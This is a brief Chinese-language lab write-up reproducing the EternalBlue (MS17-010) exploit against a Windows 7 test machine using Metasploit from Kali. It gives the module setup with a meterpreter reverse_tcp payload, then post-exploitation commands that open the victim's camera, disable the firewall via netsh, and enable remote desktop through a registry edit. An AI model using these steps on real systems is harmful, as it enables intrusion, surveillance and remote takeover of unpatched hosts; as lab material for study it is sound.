【漏洞复现】永恒之蓝漏洞

永恒之蓝漏洞复现

\

使用msfconsole来对ms17-010来进行扫描和利用

靶机：win7-x64

测试机：kali

扫描ms17-010漏洞

1. 在kali中启动使用msfconsole启动msfconsole
2. 使用search ms17-010搜索关于ms17-010的模块
3. 先调用搜索到的模块，再查看搜索模块的配置选项
4. 需要设置IP地址，确认设置信息都没用遗漏后，运行扫描
5. 发现漏洞。可以使用back退回

利用ms17-010漏洞

1. 还是再msf中调用攻击模块，并查看选项
   

2. 对选项进行相关的配置，确认没有遗漏后，就可以执行

   set payload windows/x64/meterpreter/reverse_tcp
   set rhost x.x.x.x //靶机IP
   set lhost x.x.x.x //测试机IP
   

3. 执行完成后，输入 shell 就可以获得系统的shell权限

获得管理员权限后的操作

可以打开对方的摄像头
*

• 可以使用命令关闭防火请，netsh advfirewall set allprofiles state off

• 可以使用命令打开3389端口

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  

  开启允许远程控制，并且确认3389端口开启
  

  在cmd中使用secpol.msc打开本地安全策略，关闭拒绝
  远程登陆桌面成功